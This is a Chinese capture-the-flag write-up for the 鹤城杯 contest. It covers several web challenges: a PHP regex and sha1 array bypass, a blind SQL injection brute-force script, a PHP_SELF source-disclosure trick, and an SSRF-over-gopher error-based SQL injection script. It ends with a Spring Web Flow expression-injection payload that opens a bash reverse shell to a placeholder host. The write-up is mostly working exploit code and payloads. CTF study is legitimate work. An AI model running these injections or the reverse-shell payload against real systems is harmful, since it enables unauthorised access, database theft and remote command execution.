CTF - 鹤城杯 witeup

middle_magic

<?php
highlight_file(__FILE__);
include "./flag.php";
include "./result.php";
if(isset($_GET['aaa']) && strlen($_GET['aaa']) < 20){

    $aaa = preg_replace('/^(.*)level(.*)$/', '${1}<!-- filtered -->${2}', $_GET['aaa']);

    if(preg_match('/pass_the_level_1#/', $aaa)){
        echo "here is level 2";

        if (isset($_POST['admin']) and isset($_POST['root_pwd'])) {
            if ($_POST['admin'] == $_POST['root_pwd'])
                echo '<p>The level 2 can not pass!</p>';
            // START FORM PROCESSING
            else if (sha1($_POST['admin']) === sha1($_POST['root_pwd'])){
                echo "here is level 3,do you kown how to overcome it?";
                if (isset($_POST['level_3'])) {
                    $level_3 = json_decode($_POST['level_3']);

                    if ($level_3->result == $result) {

                        echo "success:".$flag;
                    }
                    else {
                        echo "you never beat me!";
                    }
                }
                else{
                    echo "out";
                }
            }
            else{

                die("no");
            }
            // perform validations on the form data
        }
        else{
            echo '<p>out!</p>';
        }

    }

    else{
        echo 'nonono!';
    }

    echo '<hr>';
}

?>

?aaa=pass_the_level_1%23%0aa

admin[]=1&root_pwd[]=2&level_3={"result":0}

easy_sql_2

admin:admin成功登录，轻松注库名：ctf，版本：8.0.26-0

password=admin&username=admin'/**/and/**/ascii(substr((database()),1,1))>0#

password=admin&username=admin

过滤了select、tables不知道表名

库名、表名不区分大小写，用table进行列比较

库名：ctf

('def','{flag+chr(ascii)}','~','~','~','~')>(table information_schema.schemata limit 4,1)

表名：fl11aag（用innodb_table_stats绕tables过滤）

('ctf','{flag+chr(ascii)}','2021-04-30 21:15:31',0,0,0)>(table mysql.innodb_table_stats limit 1,1)

记录（flag含大小写，庆幸的是flag只有一行，直接查，不用列比较）

exp：

import requests
url='http://182.116.62.85:26571/login.php'
select='hex((table ctf.fl11aag limit 1,1))'.replace(' ','/**/')

flag=''
for i in range(1,100):
    for ascii in range(1,128):
        # payload=f"password=admin&username=admin'/**/and/**/ascii(substr(({select}),{i},1))={ascii}#"
        # payload=f"password=admin&username=admin"
        # response=requests.get(url=url)
        # response=requests.post(url=url, data=payload)
        # response=requests.post(url,data={"password":"admin","username":f"'/**/or/**/ascii(substr(({select}),{i},1))={ascii}#"})
        response=requests.post(url,data={"password":"admin","username":f"'/**/or/**/ascii(substr(({select}),{i},1))={ascii}#"})
        # data={"password":"admin","username":f"'/**/or/**/('def','{flag+chr(ascii)}','~','~','~','~')>(table information_schema.schemata limit 4,1)#".replace(' ','/**/')}
        # data={"password":"admin","username":f"'/**/or/**/('ctf','{flag+chr(ascii)}','2021-04-30 21:15:31',0,0,0)>(table mysql.innodb_table_stats limit 1,1)#".replace(' ','/**/')}
        # response=requests.post(url,data=data)
        # print(data,response.text)
        if 'success' in response.text:
            flag+=chr(ascii)
            print(flag)
            break
        if ascii==127:
            exit(0)

EasyP

<?php
include 'utils.php';

if (isset($_POST['guess'])) {
    $guess = (string) $_POST['guess'];
    if ($guess === $secret) {
        $message = 'Congratulations! The flag is: ' . $flag;
    } else {
        $message = 'Wrong. Try Again';
    }
}

if (preg_match('/utils.php/*$/i', $_SERVER['PHP_SELF'])) {
    exit("hacker :)");
}

if (preg_match('/show_source/', $_SERVER['REQUEST_URI'])){
    exit("hacker :)");
}

if (isset($_GET['show_source'])) {
    highlight_file(basename($_SERVER['PHP_SELF']));
    exit();
}else{
    show_source(__FILE__);
}
?>

/index.php/utils.php/%80?%73how_source

easy_sql_1

ssrf打mysql，admin:admin登进去，注半天注不出来，赛后请教师傅才知道是原题，注入点在成功登录设置的cookie中

Cookie: this_is_your_cookie=YWRtaW4%3D;

报错注入，没任何过滤，注了直接出

# import base64
# print(base64.b64encode(b'test'))

import requests
import base64
from urllib.parse import quote
url="http://182.116.62.85:28303/use.php"
data="""POST / HTTP/1.1
Host: 127.0.0.1
Content-Type:application/x-www-form-urlencoded
Cookie: this_is_your_cookie={}
Content-Length: {}
{}
"""
payload="""uname=admin&passwd=admin"""
# data=quote(data.format(base64.b64encode("admin') and updatexml(1,concat(0x7e,(select database())),1)#".encode("utf-8")).decode('utf8'),len(payload),payload)).replace('%0a','%0d%0a')
# data=quote(data.format(base64.b64encode("admin') and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 3,1)),1)#".encode("utf-8")).decode('utf8'),len(payload),payload)).replace('%0a','%0d%0a')
data=quote(data.format(base64.b64encode(b"admin') and updatexml(1,concat(0x7e,(select flag from flag)),1)#"),len(payload),payload)).replace('%0a','%0d%0a')
params={
    "url":"gopher://127.0.0.1:80/_"+data
}
print(params)
response=requests.get(url=url,params=params)
print('this_is_your_cookie' in response.text)
print(response.text)

Spring

https://www.cnblogs.com/cute-puli/p/13363752.html

_eventId_confirm=&_csrf=57033da7-4538-42ec-9933-e12ac3e97db5&_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/x.x.x.x/2333+0>%261")).start()=vulhub